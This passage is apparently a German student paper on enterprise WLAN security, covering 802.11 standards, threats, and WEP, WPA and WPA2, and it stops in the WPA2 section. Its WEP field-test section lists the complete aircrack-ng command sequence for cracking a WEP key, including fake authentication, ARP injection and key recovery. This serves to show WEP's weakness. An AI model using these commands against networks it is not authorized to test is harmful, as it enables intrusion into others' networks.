Aus Winfwiki

Wechseln zu: Navigation, Suche

Autor:	Holger Janßen
Modul:	IT-Infrastruktur
Standort:	FOM - Duisburg

Abkürzungsverzeichnis

Abkürzung	Bedeutung
AES	Advances Encryption Standard
AP	Access Point
CA	Certification Authority / Zertifizierungsinstanz
CCMP	CTR/CBC-MAC Protocol
CCX	Cisco Compatible Extensions
DoS	Denial-of-Service
EAP	Extensible Authentication Protocol
FIPS	Federal Information Standards
GHz	Gigahertz
IDS	Intrusion Detection System
IEEE	Institute of Electrical and Electronic Engineers
IPSec	IP Security Protocol
ISM	Industrial-Scientific-Medical
IT	Information Technology
IV	Initialisierungsvektor
LAN	Local area network
LEAP	Lightweight Extensible Authentication Protocol
MAC	Medium Access Control
MBit/s	Megabit pro Sekunde
MIC	Message Integrity Check
OSI	Open System Interconnection
PEAP	Protected Extensible Authentication Protocol
PKI	Public Key Infrastructure
QoS	Quality of Service
PSK	Pre-shared Key
RADIUS	Remote Authentication Dial-In User Service
RC4	Ron’s Cipher 4
RSN	Robust Security Network
SSID	Service Set Identifier
TCO	Total cost of ownership
TKIP	Temporal Key Integrity Protocol
TLS	Transport Layer Security
VLAN	Virtual Local Area Network
VoIP	Voice over IP
VPN	Virtual Private Network
WEP	Wired Equivalent Privacy
WiFi	Wireless Fidelity
WLAN	Wireless Local Area Network
WLC	Wireless Lan Controller
WPA	Wi-Fi Protected Access

Abbildungsverzeichnis

Abb.-Nr.	Abbildung
Abb. 1:	Weltweite WLAN Prognose Juni 2005
Abb. 2:	Frequenzkanäle im 2,4 GHz Frequenzband
Abb. 3:	Airodump Anzeige mit Informationen über aktive Access Points
Abb. 4:	Airodump Anzeige über gesammelte Pakete
Abb. 5:	Aircrack Anzeige des entschlüsselten WEP Keys
Abb. 6:	Konzept einer WLAN Sicherheitsinfrastruktur

Tabellenverzeichnis

Tab. Nr.	Quelle
Tabelle 1:	IEEE 802.11 Standards
Tabelle 2:	Vergleich EAP Protokolle

1 Einleitung

Ein Wireless Local Area Network (WLAN) ist ein drahtloses lokales Funknetz, wobei damit heutzutage in der Regel der 1997 verabschiedete 802.11-Standard des Institute of Electrical and Electronics Engineers (IEEE) gemeint ist. Hielt sich die Bedeutung und Beliebtheit dieser Technologie anfangs noch stark in Grenzen, folgte vor allem durch die Einführung der ersten Generation von Intels Mobiltechnologie "Centrino" im Jahre 2003^[1] eine lawinenartige Verbreitung.

Abb. 1: Weltweite WLAN Prognose Juni 2005

Die Vorzüge wurden dabei vor allem durch private Anwender geschätzt, wohingegen die meisten Unternehmen dieser Technik wenig Vertrauen entgegenbrachten und weitgehend auf die Nutzung verzichteten. Gründe waren die Störanfälligkeit und vor allem Sicherheitsbedenken. Verstärkt wurden diese Befürchtungen durch Schwachstellen des Verschlüsselungsmechanismus WEP, welcher bereits seit dem Jahre 2001 als nicht sicher gilt. Seitdem wurden zahlreiche Verbesserungen entwickelt und als erweiterte Standards verabschiedet. Dies hat in Verbindung mit gestiegenen Anforderungen von Anwendern und Geschäftsprozessen zu einer starken Verbreitung von WLAN im betrieblichen Umfeld geführt. Die vielfältigen Einsatzmöglichkeiten sowie die Vorteile des unabhängigen und mobilen Arbeitens ermöglichen Unternehmen eine Steigerung der Produktivität und geringere Kosten. Die mit Funktechnik einhergehenden Sicherheitsrisiken bergen aber auch große Gefahren, so dass die Absicherung des WLAN eine große Herausforderung für Unternehmen bleibt.

Diese Facharbeit konzentriert sich auf die Entwicklung, Standards und technische Grundlagen der IEEE 802.11 WLAN Technologie (Teil 1), den Sicherheitsrisiken/-mechanismen und deren Bewertung für den Unternehmenseinsatz (Teil 2) und stellt eine mögliche Umsetzung eines Sicherheitskonzeptes vor (Teil 3).

2 Grundlagen WLAN

2.1 Entwicklung und Standards

Kabellose Netzwerktechnologien wurden in den 90er Jahren zunächst für den 60 GHz-Bereich entwickelt und später in den 2,4- und 5-GHz-Bereich übertragen, um diese für den kommerziellen Bereich tauglich zu machen. Herausgebildet haben sich Standards wie 802.11, HomeRF und HIPERLAN sowie proprietäre Techniken. Durchgesetzt hat sich aber vor allem der 1997 von der IEEE veröffentlichte 802.11-Standard, der seither stetig erweitert wird, um z.B. die Datenrate, Reichweite und vor allem Datensicherheit zu erhöhen.
Die Wi-Fi Alliance ist eine 1999 gegründete, über 300 Unternehmen umfassende Organisation, die Produkte verschiedener Hersteller auf der Basis des IEEE-802.11-Standards^[2] zertifiziert und so den Betrieb mit verschiedenen Wireless-Geräten gewährleistet (Interoperabilität).

Folgende wesentlichen Standards wurden bisher verabschiedet^[3]:

Jahr	Standard	Merkmal	Beschreibung
1997	802.11	2 MBit/s - 2,4-GHz-Band	Ursprünglicher Standard der praktisch nicht mehr benutzt wird
1999	802.11a	54 MBit/s - 5 GHz-Band	Durch den 5 GHz Breich relativ störungsfrei bei geringer Reichweite (15 und 25 Meter).
1999	802.11b	11 MBit/s - 2,4 GHz-Band	Weit verbreiteter Standard mit den Vorteilen der höheren Reichweite und Kompatibilität zu 802.11g, aber störanfällig (Bluetooth, Mikrowelle)
1998	802.11c	Wireless Bridging	Standard für die drahtlose Koppelung unterschiedlicher Netzwerk-Topologien
2001	802.11d	World Mode	Regelt u.a. Anzahl und Auswahl der Kanäle in unterschiedlichen Ländern
2005	802.11e	QoS und Streaming	Erweiterung für 802.11 a/g/h u.a. mit QoS (Quality Of Service) für Multimedia und VOIP.
2003	802.11f	Roaming	Erweiterung für 802.11 a/g/h - Verfahren für das Roaming nach dem IAPP (Inter Access Point Protocol)
2003	802.11g	54 MBit/s - 2,4 GHz-Band	Abwärtskompatibel und bzgl. Sendeleistung und Reichweite vergleichbar zum b Standard.
2003	802.11h	54 MBit/s - 5 GHz-Band	Dynamisches Frequenz- und Leistungsmanagement (Dynamic Frequency Selection und Transmit Power Control)
2004	802.11i	Authentifizierung Verschlüsselung	Erhöhung der Sicherheit durch u.a. Authentifizierung nach 802.1x und Verschlüsselung nach AES (Advanced Encryption Standard)

Tabelle 1: IEEE 802.11 Standards

Ausblick: In 2003 gestartet und für 2009 erwartet, soll 802.11n die Übertragungsrate auf 108Mbit/s - 320MBit/s erhöhen.^[4]

2.2 Technische Grundlagen

Fast alle derzeit auf dem Markt verfügbaren und gängigen WLAN (auch WiFi genannten) Systeme basieren auf dem 802.11 Standard, der Festlegungen bezüglich der OSI-Schichten 1 (Physical Layer) und 2 (MAC-Layer) enthält. Im Gegensatz zu kabelgebundenen Netzwerken (z.B. Koaxkabel, Twisted Pair, Glasfaser) werden die Daten beim WLAN mittels Funkwellen über die Luft übertragen^[5]. Dazu werden entweder der lizenzfreie Frequenzbereich von 2,4 bis 2,48 GHz (b und g Standard) des ISM (Industrial, Scientific and Medical) Band oder ein ebenfalls kostenfreies 5 GHz Frequenzband (a und h Standard) genutzt. Die standardisierten Bandbreiten betragen dabei 11 oder 54 MBit/s brutto und bieten abhängig von Umgebung, Betriebsart und Sendeleistung eine Reichweite von 10 Metern (Gebäude) bis zu einigen hundert Metern (freie Umgebung).
In Deutschland sind vor allem Systeme des b oder g Standards verbreitet. Beiden Standards stehen dabei 13 Frequenzkanäle mit einem Frequenzabstand von 5 MHz für die Funkübertragung zur Verfügung. Bei einer Kanalbandbreite von ca. 22 MHz können jedoch nur maximal 3 Kanäle (1, 6,11) gleichzeitig überlappungsfrei genutzt werden.

Abb. 2: Frequenzkanäle im 2,4 GHz Frequenzband

WLANs können in zwei unterschiedlichen Betriebsmodi, dem AdHoc- oder Infrastrukturmodus betrieben werden. Beim AdHoc-Modus kommunizieren einzelne Clients mit einer Funkkarte direkt miteinander. Dieser Modus eignet sich hauptsächlich für temporäre Netzwerke und spielt im professionellen Umfeld keine große Rolle. Kabellose Unternehmensnetzwerke werden dagegen meist im Infrastrukturmodus betrieben, welcher aus mindestens zwei WLAN Endgeräten und einem zentralen Zugangspunkt (Access Point, AP) besteht. Mittels Infrastrukturmodus ist eine einfache Integration in das Unternehmensnetzwerk möglich, indem die Access Points über Switches mit dem fest verkabelten Netzwerk verbunden werden.

Der Infrastruktur-Modus lässt mehrere Einsatzvarianten zu:

Große Bereiche können flächendeckend mit einem Funknetzwerk versorgt werden, indem durch mehrere Access Points überlappende Funkzellen installiert werden. So kann beim Übergang eines Clients in die nächste Funkzelle die Funkverbindung aufrechterhalten werden ("Roaming / Handover").
Zudem können Access Points auch als Bridge zwischen leitungsgebundenen LANs eingesetzt werden. Ebenso ist der Einsatz eines Access Points als Repeater zur Erhöhung der Reichweite möglich.

2.3 Vorteile

Obwohl der IEEE 802.11 Standard bereits mehr als 10 Jahre alt ist, hat die Technologie erst in den letzten Jahren Akzeptanz in vielen Unternehmen gefunden. Durch stetige Verbesserung und Weiterentwicklung zählt WLAN heutzutage als technisch ausgereifte, zuverlässige und preiswerte Alternative oder Ergänzung zur festen Verkabelung. Die Funktechnik bietet dabei technische, organisatorische und finanzielle Vorteile.^[6]
So kommt WLAN dem wachsenden Wunsch nach Mobilität und Flexibilität entgegen und verspricht damit eine Steigerung der Produktivität und Senkung der Betriebskosten. Ein per WLAN mit dem Unternehmensnetz verbundener Mitarbeiter kann sich frei im Unternehmen bewegen und ist nicht an einen festen Arbeitsplatz gebunden.
Ebenso gibt es Prozesse, bei denen Mobilität eine unverzichtbare Voraussetzung darstellt, wie beispielsweise Inventuren und Lagerverwaltung.
Ein weiterer Vorteil ist dass ein WLAN schnell und kostengünstig aufgebaut und erweitert werden kann. Diese Skalierbarkeit ermöglicht eine bessere Anpassung an die stetigen Veränderungen in Unternehmen z.B. bei Umstrukturierungen, Einstellungen neuer Mitarbeiter oder dem Ausscheiden von Mitarbeitern. Dazu eignen sich kabellose Netzwerke überall dort, wo eine konventionelle Verkabelung nicht möglich, nicht flexibel genug oder einfach zu aufwendig und damit zu teuer ist. Ein Beispiel können temporäre Arbeitsgruppen bei Meetings oder Workshops sein. Ebenso können verschiedene Gebäude auf einem Firmengelände per WLAN verbunden werden.
Die geringen Kapital-/ und Betriebskosten ergeben sich aus der günstigen Hardware, der einfachen Erweiterbarkeit (keine Neuverkabelung notwendig) und dem lizenzfreien Funkbereich. Dabei kann heutzutage ein mit dem verkabelten Netzwerk vergleichbares Sicherheitsniveau realisiert werden.

2.4 Nachteile

Den Vorteilen der WLAN Technologie im Bereich Funktionalität und Kostenersparnis stehen aber auch Sicherheitsbedenken und technische Einschränkungen gegenüber.^[7]
Im Gegensatz zur festen Verkabelung breitet sich ein Funknetzwerk auch außerhalb von Raum- und Unternehmensgrenzen aus, so dass ein Zugriff unautorisierter Personen leichter möglich ist. Ein Angreifer kann sich in sicherer Entfernung aufhalten und ohne zeitliche Beschränkung versuchen, vorhandene Sicherheitsmechanismen zu überwinden.
Oftmals wird dies erleichtert, weil das Gefahrenbewusstsein bei den Unternehmensverantwortlichen nur unzureichend ist, so dass WLAN Netzwerke gar nicht oder nur in Form einfacher Funktionen der ersten Generation geschützt werden.^[8] Kann ein Angreifer die vorhandenen Schutzmechanismen „knacken", steht ihm oft das ganze Unternehmensnetzwerk offen. Ein unzureichend geschütztes WLAN kann also das Einfallstor eines ansonsten gut abgesicherten Netzwerkes darstellen. Die erhöhten Anforderungen an Absicherung und Überwachung eines Funknetzwerkes können somit auch die tatsächlichen Kosten (TCO) deutlich erhöhen.
Weitere Nachteile sind die geringere Bandbreite, da sowohl die Brutto- als auch die Nettogeschwindigkeit deutlich unter den Möglichkeiten fester Netzerwerke liegen und sich außerdem alle Benutzer einer Funkzelle die Bandbreite teilen müssen (Shared medium). Außerdem besteht die Gefahr möglicher Störungen, da z.B. Funkboxen / Mikrowellen das WLAN stören und bauliche Gegebenheiten wie Stahlträger oder Metallverstrebungen die Reichweite stark einschränken.

2.5 Unternehmensanforderungen

Zusätzlich müssen weitere Anforderungen von Unternehmen an die WLAN Technik berücksichtigt werden, die abhängig vom Einsatzzweck sein können. Dazu zählen:

Nutzung offener Standards anstatt Einsatz proprietärer Technik, ermöglicht Interoperabilität, Erweiterbarkeit und Investitionssicherheit
Unterstützung aktueller Sicherheitsstandards
Möglichkeit der Integration in vorhandene Infrastruktur und Skalierbarkeit
Verfügbarkeit bei Ausfall einzelner Komponenten muss gewährleistet bleiben
Zentrales Management: Konfiguration, Verwaltung, (proaktives) Monitoring der WLAN Infrastruktur
Verlustfreies Roaming / Handover beim Einsatz mobiler Clients (z.B. Funk-Terminals auf Flurförderfahrzeugen) und VoIP
Nutzung und Management zusätzlicher Dienste, wie:
- VLAN: Bedarfsgerechten Sicherheitsniveaus, Separierung
- QoS: Konfiguration Bandbreite, Antwortzeiten für zeitkritische Dienste

3 WLAN Sicherheit

3.1 Sicherheitsrisiken

Aufgrund der technischen Gegebenheiten eines Funknetzwerks gibt es erhöhte Sicherheitsrisiken, wie:

- unautorisierter Zugriff auf Daten / das Netzwerk
- unbemerkte Veränderung der Daten
- Vorspielung einer anderen Identität
- Störung der Kommunikation

Die wesentlichen Sicherheitsbedrohungen sind dabei:^[9]^[10]

Abhören des Netzwerkverkehres: Abfangen vertraulicher Daten und ungeschützter Anmeldeinformationen
Abfangen und Manipulation von Daten (Man-in-the-Middle): Übernehmen der Datenübertragung zwischen zwei rechtmäßigen Netzwerkbenutzern durch einen Dritten, der die Daten lesen und ggf. ändern kann
Spoofing: Verschleierung der eigenen bzw. Vortäuschung einer autorisierten Identität zum Empfang oder Versand von Daten
Störung der Funksignale (Denial-of-Service): Beeinträchtigung des Netzwerkverkehrs mittels Störquellen, wie z.B. Mikrowellen, Angriffe auf die drahtlosen Protokolle niedrigerer Ebene, sowie schlichte Datenüberflutung durch wahllosen Datenverkehr
"Schwarzsurfen" (Ressourcendiebstahl): Eindringlinge möchten möglicherweise "nur" kostenlos das Internet erreichen. Dies führt zumindest zu einer geringeren Verfügbarkeit der Dienste und auf diese Weise können Viren eingeschleust werden
Unautorisierte Hardware: Unkontrollierter Einsatz von Hardware, z.B. ein von einem Mitarbeiter installierter Access Points (Rogue Access Point) kann zu Sicherheitslücken im Netzwerk führen
Schwachstellen Software: Bekannte Schwachstellen von Betriebssystemen, Sicherheitsmechanismen oder Firmware können ausgenutzt werden

Die tatsächlichen Gefahren reichen dabei von der Störung des Unternehmensnetzwerkes über das Abfangen und Mitlesen bis zur Manipulation von Informationen. Dabei sind sowohl die übertragenen als auch die im Netzwerk gespeicherten Daten bedroht. Betrachtet man realistische Gefahren wie Betriebsspionage und Terrorismus, kann dies die Existenz des Unternehmens gefährden.

3.2 Sicherheitsmaßnahmen

Bei der Planung und Implementierung eines WLAN Netzwerkes sind daher sowohl organisatorische als auch technische Maßnahmen zur Absicherung des Netzwerkes nötig, die wie folgt unterteilt werden:

Organisatorische Maßnahmen
Grundlegende technische Maßnahmen
Verschlüsselungs- und Authentifizierungsmechanismen
- WEP
- Alternative Mechanismen
- Neue 802.11 Sicherheitsstandards

Im folgenden Abschnitt werden diese Mechanismen beschrieben und für den Einsatz im professionellen Unternehmensumfeld bewertet.

3.2.1 Organisatorische Maßnahmen

Organisatorische Maßnahmen sind zur Absicherung eines Funknetzwerkes von zentraler Bedeutung, auch wenn zumeist die technischen Schutzmaßnahmen im Fokus stehen. Aus diesem Grund sollte geprüft werden, ob folgende Rahmenbedingungen vorhanden sind und ggf. erweitert werden müssen:

Allgemeine IT Richtlinie^[11]

Eine IT Richtlinie legt die Rahmenbedingungen für den Umgang mit IT-Systemen im Unternehmen fest. Sie basiert auf unternehmensspezifischen Anforderungen unter Berücksichtigung der gesetzlichen Vorschriften. Wesentliche Inhalte sind:

Vorgaben zum Umgang mit Informationen
Rechtsvorschriften
IT Organisation
Verwaltung und Nutzung von IT-Diensten
Sicherheitsmaßnahmen: Zutritts- und Zugangsregelungen, Verschlüsselung, Virenschutz, Updates, Datensicherung und Archivierung
Notfallvorsorge
Dienstspezifische Regelungen (z.B. für den WLAN Zugriff)

Schulung und Sensibilisierung^[12]

Insbesondere für die spezifischen Sicherheitsrisiken eines WLAN Netzwerkes ist es sinnvoll, die Mitarbeiter im Umgang mit dieser Technologie und deren Gefahren zu sensibilisieren.

IT Sicherheitskonzept

Ein IT Sicherheitskonzept umfasst u.a. die Aufstellung und Implementierung allgemeiner Sicherheitsstandards, Bedrohungsanalysen, Kontrollmechanismen und ein pro-aktives Sicherheitsmanagement. Wichtig ist zudem eine möglichst hohe Standardisierung zur Reduzierung der möglichen Angriffsfläche und der Konzentration auf deren spezifischen Schwachstellen. Dabei stellen oftmals „Altsysteme" ein Sicherheitsrisiko dar, da z.B. unsichere Verschlüsselungs-mechanismen aus Kompatibilitätsgründen unterstützt werden müssen.

3.2.2 Grundlegenden technischen Maßnahmen

Durch verschiedene, einfach umzusetzende Maßnahmen kann das Sicherheitsniveau erhöht werden^[13]:

Änderung der Standardkennwörter: Access Points werden mit Standardkonfigurationen und -kennwörtern ausgestattet, die verändert werden sollten.
Änderung des Netzwerknamens (SSID): Der Name sollte keine Rückschlüsse auf Betreiber, Nutzungszweck oder Standort ermöglichen und die "Broadcast"-Option sollte deaktiviert werden. Dies bietet keinen echten Schutz, aber beide Maßnahmen erschweren die Erkennung des ersten Angriffspunkts.
Platzierung Access Points: Durch eine optimale Platzierung der Access Points, die Konfiguration der Sendestärke und die Wahl der Antennen kann eine ungewollte Ausbreitung der Funkwellen begrenzt werden. Dies sollte durch eine professionelle Vermessung, die sog. Site Survay realisiert werden.
Abschaltung Access Points: Durch eine zeitgesteuerte, automatisierte Abschaltung der Access Points kann die Sicherheit deutlich erhöht werden. Dies ist allerdings vom Nutzungsverhalten abhängig und kann die Flexibilität einschränken.
Aktuelle Firmware Access Points: Eine regelmäßige Kontrolle neuer Firmware bzw. zusätzlicher Sicherheitsupdates, hilft dabei Sicherheitslücken zu schließen und ggf. neue Sicherheitsfunktionen nutzen zu können.
Client Sicherheit: Clients sollten aktuelle Sicherheitssoftware, aktuelle Betriebssystem-Patches und Firewalls nutzen
MAC-Adressfilterung: Der Einsatz des Filters ist aufwendig und lässt sich leicht überwinden, so dass dies nur in speziellen Fällen Sinn macht.

3.2.3 Verschlüsselungs- und Authentifizierungsmechanismen

Das Ziel der Verschlüsselungs- und Authentifizierungsmechanismen ist die Erhöhung der „Sicherheit" des Netzwerkes. Zum Verständnis und Bewertung der Sicherheitsmechanismen ist es daher notwendig, diesen pauschalen Begriff detaillierter zu betrachten. Die Netzwerksicherheit umfasst:

Zugangsschutz: Nur autorisierte Benutzer/Geräte sollen Zugriff auf das WLAN und die gewünschten Access Points bekommen

=> Authentifizierung der Teilnehmer (Client und Server)

Datenintegrität: Die übertragenen Daten sollen unverfälscht beim Empfänger ankommen, manipulierte Daten sollen erkannt und verworfen werden.

=> Kontrolle der Pakete anhand von Prüfsummenverfahren

Vertraulichkeit: Unbefugte Dritte sollen nicht in der Lage sein, den Datenverkehr mitzuhören.

=> Verschlüsselung der Daten

3.2.3.1 WEP

WEP^[14] war der Einzige im IEEE 802.11 Basisstandard vorgesehene Sicherheitsmechanismus und sollte als „Gesamtpaket" alle o.a. Anforderungen abdecken. Mit WEP soll die Vertraulichkeit, Integrität der übertragenen Daten, sowie die Authentisierung des Endgerätes gesichert werden. Das WEP-Protokoll basiert auf der Stromchiffre RC4, mit der Klardaten paketweise, abhängig von einem Schlüssel und einem Initialisierungsvektor (IV) in Chiffredaten umgewandelt werden. Der Schlüssel ist dabei eine Zeichenkette von wahlweise 40 oder 104 Bit und muss den Clients und Access Points vorab zur Verfügung gestellt werden. Dabei wird für das gesamte Funk-LAN ein gemeinsamer statischer Schlüssel verwendet. Der IV, dem verschlüsselten Datenpaket unverschlüsselt vorangestellt, wird vom Absender gewählt und sollte für jedes übertragene Datenpaket unterschiedlich sein. Die WEP Verschlüsselung ist mittlerweile mehrfach "geknackt" und bietet daher (fast) keinen Schutz mehr.

3.2.3.1.1 Schwachstellen WEP

Der WEP Mechanismus weist folgende Schwachstellen^[15] auf:

Zu kurze WEP-Schlüssel
Kein Schlüsselmanagement
Zu kurze und schwache Initialisierungsvektoren
Mangelhafte Integritätsprüfung
Fälschbare Authentisierung
Fehlende Access-Point-Authentifizierung
Keine Benutzer-Authentifizierung
Unverschlüsselte Steuerungsdaten

3.2.3.1.2 Feldversuch Sicherheitstest WEP

Die Schwachstellen des WEP Protokolls sind allgemein bekannt, unklar waren allerdings der Aufwand und das KnowHow, welche zur Entschlüsselung des WEP-Keys nötig sind. Dies wurde in einem Feldversuch nachgewiesen:

Folgenden technischen Hilfsmittel wurden eingesetzt
Hardware: Notebook, D-Link DWL-AG650 Wireless Karte Software: Linux mit folgenden Tools^[16]

Airmon: Informationen über aktive Access Points
Aireplay: Injizieren von ARP-Request Paketen, um Verkehr zu generieren
Packetforge: Erzeugen von verschlüsselten Paketen für Aireplay
Airodump: Empfangen und Speichern von Paketen
Aircrack: Entschlüsseln des WEP/WPA Schlüssel

Vorgehensweise^[17]
1. Auslesen der Informationen des zu knackenden Access Point mit airodump (hier linksys)

Befehl: airodump-ng ath0

Abb. 3: Airodump Anzeige mit Informationen über aktive Access Points

2. Wireless Karte in den Monitor Mode setzen mit airmon

Befehl: airmon -ng start wifi0 11

3. Fake Authentifizierung mit Access Point mit aireplay

Befehl: aireplay-ng -1 0 -e linksys -a 00:1C:10:2F:A8:98 -h 00:05:5D:9F:C7:7C ath0

4. PRGA (pseudo random generation algorithm) ermitteln mit aireplay

Befehl: aireplay-ng -5 -b 00:1C:10:2F:A8:98 -h 00:05:5D:9F:C7:7C ath0

5. ARP Packet erstellen mit packetforge

Befehl: packetforge-ng -0 -a 00:1C:10:2F:A8:98 -h 00:05:5D:9F:C7:7C -k 255.255.255.255 -l 255.255.255.255 -y fragment-1223-100229.xor -w arp

6. Initialisierungsvectoren sammeln mit airodump

Befehl: airodump-ng -c 11 --bssid 00:1C:10:2F:A8:98 -w capture ath0

Abb. 4: Airodump Anzeige über gesammelte Pakete

7. Maniplierte ARP Pakete zur Erzeugung von IVs an Access Point schicken mit aireplay

Befehl: aireplay-ng -2 -r arp-request ath0

8. WEP Key entschlüsseln mit aircrack

Befehl: aircrack-ng -b 00:1C:10:2F:A8:98 capture*.cap

Abb. 5: Aircrack Anzeige des entschlüsselten WEP Keys

Fazit
Überraschendes Ergebnis war, dass der WEP Schlüssel in weniger als einer Minute geknackt werden konnte. Möglich ist dies durch den Einsatz verbesserter Angriffstechniken, wobei die Anzahl der benötigten Pakete deutlich reduziert und der dazu notwendige Netzwerkverkehr selbst erzeugt werden kann. Da zudem das notwendige KnowHow sehr gering ist (Anleitungen finden sich im Internet^[18]) und die Hardware / Software günstig bis kostenlos beschafft werden kann, ist WEP keine Sicherheitshürde mehr.

3.2.3.2 Alternative Mechanismen

Die Aufdeckung der Schwachstellen des WEP-Protokolls im Jahre 2001 führte insbesondere bei Unternehmen zu einem deutlichen Vertrauensverlust. Als Folge reagierten die Hersteller von WLAN Produkten mit proprietären Erweiterungen des 802.11 Standards. Auf der anderen Seite implementierten Unternehmen bewährte und von der Übertragungstechnik unabhängige Techniken zur Absicherung von Netzwerken.

3.2.3.2.1 Proprietäre Techniken

Insbesondere der Marktführer Cisco entwickelte eigene Sicherheitsmechanismen:

LEAP (Lightweight Extensible Authentication Protocol) ist eine EAP Variante
CKIP (Cisco Key Integrity Protocol) ist eine Verschlüsselungstechnik
Cisco kompatible Erweiterungen (CCX) umfassen verschiedene Verbesserungen (bzgl. Sicherheit, Roaming, Handhabung)

Die Schwachstellen von WEP, das Fehlen standardisierter Alternativen und die Marktmacht von Cisco haben zu einer relativen Verbreitung geführt. Seit der Verfügbarkeit sicherer 802.11 Standards, wie WPA/WPA2 (s.u.) und der Einschränkungen bezüglich Interoperabilität und somit der Abhängigkeit zum Hersteller beim Einsatz proprietärer Mechanismen geht die Bedeutung stark zurück. Zudem wurden auch in den Cisco Standards Schwachstellen entdeckt^[19], die Vertrauen gekostet haben.

3.2.3.2.2 Alternative Techniken

Die vorgestellten Verschlüsselungsverfahren arbeiten alle in der zweiten Netzwerkschicht, der Sicherungsschicht des OSI-Modells. Eine Alternative stellen vor allem Virtual Private Networks (VPN) dar, die sich bereits über Jahre im LAN/WAN bewährt haben und so hohe Akzeptanz genießen. Mit VPN werden die Daten auf höherer Ebene verschlüsselt und es wird eine sichere Netzwerkkommunikation über ein unsicheres Medium mittels eines virtuellen Tunnels ermöglicht. Dazu können zur Authentifizierung, Komprimierung und Verschlüsselung Protokolle, insbesondere IPSec, genutzt werden. Alternativen sind das Point-to-Point-Tunneling-Protocol (PPTP) oder Layer 2 Tunneling Protokoll (L2TP).
VPN erhöhen dabei die Sicherheit im Vergleich zu WEP deutlich, erfordern aber auch eine Unterstützung der gewünschten Protokolle durch die Clients. Dies hat Kompatibilitätsprobleme, eine Absenkung der Benutzerfreundlichkeit und Funktionalität, sowie einen wesentlich höheren Aufwand bei der Implementierung und Verwaltung zur Folge.
So wurden VPN im WLAN, ebenso wie proprietäre Standards hauptsächlich vor Entwicklung aktueller WLAN Sicherheitsmechanismen eingesetzt. Lediglich für Bereiche mit sehr hohen Sicherheitsanforderungen, wie Forschung oder Militär kann der Einsatz (evtl. zusätzlich zu WPA/WPA2) sinnvoll sein, sofern dort nicht vollständig auf WLAN verzichtet wird.

Dahingegen werden virtuelle LANs (VLAN) und Firewalls^[20] oftmals in Kombination mit den aktuellen Sicherheitsstandards eingesetzt. So kann durch eine Netzwerksegmentierung mittels Firewall und VLAN die Sicherheit weiter erhöht werden, indem nur gewünschter Verkehr ins LAN gelassen wird. Zusätzlich unterstützt der Einsatz eines Intrusion Detection Systems (IDS) die Schwachstellenanalyse und dient der Erkennung von Angriffen.

3.2.3.3 Neue Sicherheitsstandards

Nach Feststellung der WEP-Schwachstellen gründete das IEEE eine Arbeitsgruppe zur Entwicklung verbesserter Schutzmechanismen, die in den Standard IEEE 802.11i münden sollten. Da Ausarbeitung und Ratifizierung eines solchen Standards üblicherweise Jahre dauert, der Marktdruck aber sehr groß war, wurde von der Wi-Fi Alliance der Quasistandard WPA vorab definiert.

3.2.3.3.1 WPA

WPA (Wi-Fi Protected Access), im Jahre 2003 verabschiedet, war von Anfang an als Zwischenlösung geplant. Dieser Standard sollte die WEP Schwächen beseitigen, alle bis dato bekannten Sicherheitsfunktionen des 802.11i Standards beinhalten und soweit wie möglich abwärtskompatibel sein. WPA umfasst:

TKIP (Verschlüsselung)^[21] und Michael (Integrität) als Ersatz für WEP
Regelungen für die Wahl und Verlängerung des IV
Erzeugung unterschiedlicher Schlüssel für jedes Datenpaket
Einführung von Sequenznummern zur Abwehr von Replay-Angriffen
verschiedene Modi zur Authentisierung der Benutzer:

- Personal für den Privat- bzw. SoHo-Bereich mit Pre-Shared-Key (PSK)

- Enterprise für Unternehmen mit 802.1X und Radius

Im Enterprise Modus kann damit der offene und bewährte 802.1x Standard in Kombination mit Radius^[22] eingesetzt werden, wodurch ein zentrales Management unterstützt wird. Der 802.1x-Standard stellt eine Grundstruktur für verschiedene Authentifizierungsprotokolle (EAP, Extensible Authentication Protocol)^[23] dar, die nach der Anmeldung dynamische benutzerindividuelle Schlüssel für die weitere Kommunikation erstellen und so das tatsächliche Sicherheitsniveau beeinflussen. Zur Auswahl stehen u.a. folgenden EAP Protokolle^[24], die jeweils auf unterschiedlichen Mischungen von passwort- und zertifikatbasierter Authentifizierung beruhen:

Protokoll	PEAP	EAP-TLS	EAP-TTLS	EAP-MD5	LEAP
Standard	Ja	Ja	Ja	Ja	Nein (Cisco)
Verbreitung	Mittel	Hoch	Mittel	Hoch	Gering
Sicherheitslevel	Hoch	Sehr Hoch	Hoch	Sehr Schwach	Schwach
Server Zertifikat erforderlich	Ja	Ja	Ja	Nein	Nein
Client Zertifikat erforderlich	Nein	Ja	Optional	Nein	Nein
Sicherheit Benutzer-informationen	Hoch	Hoch	Hoch	Schwach	Schwach
Geräte Authentifizierung	Unterstützt	Unterstützt	Unterstützt	Nein	Nein
Implementierungs-aufwand	Gering	Hoch	Mittel	Sehr Gering	Gering
Besonderheit	MS AD Integration

Tab. 2: Vergleich EAP Protokolle

Die Struktur von WPA setzt zwar auf der vorhandenen Infrastruktur von WEP auf, behebt jedoch durch eine verbesserte Verschlüsselung, Schlüsselmanagement und beidseitige Authentifizierung konsequent die Schwachstellen von WEP. Damit wird der Aufbau von sicheren und herstellerübergreifenden WLANs ermöglicht.
So konnte WPA das Vertrauen in die IEEE WLAN Standards wiederherstellen und konnte auch 5 Jahre nach Verabschiedung nicht "geknackt" werden, obwohl mittlerweile auch hier Schwachstellen entdeckt wurden. Bei Verwendung zu kurzer PSKs im Personal Mode Kennwörter per Brute-Force-Methode^[25] erraten werden und das Integritätskontrollverfahren Michael ist durch eine Schutzfunktion anfällig gegen einfache Denial-of-Service-Attacken^[26]. Zudem wurde kürzlich eine Design Schwäche im TKIP Sequence Counter (erzeugt Sequenznummern) gefunden, der unter optimalen (theoretischen) Bedingungen eine Entschlüsselung von Paketen erlaubt, obwohl dieser Mechanismus eigentlich sog. Replay-Attacken verhindern sollte. Außerdem ist eine Abwärtskompatibilität durch die erhöhten Hardwareanforderungen nur eingeschränkt gegeben.
Empfohlen wird daher der Einsatz von WPA2 mit AES-CCMP.

3.2.3.3.2 WPA2 / IEEE 802.11i

Der seit Mitte 2004 verabschiedete Standard IEEE 802.11i enthält eine völlig neue Sicherheitsarchitektur, Robust Security Network (RSN) genannt. WPA2 Enterprise entspricht IEEE 802.11i^[27] bis auf die fehlende Unterstützung von Fast Roaming.
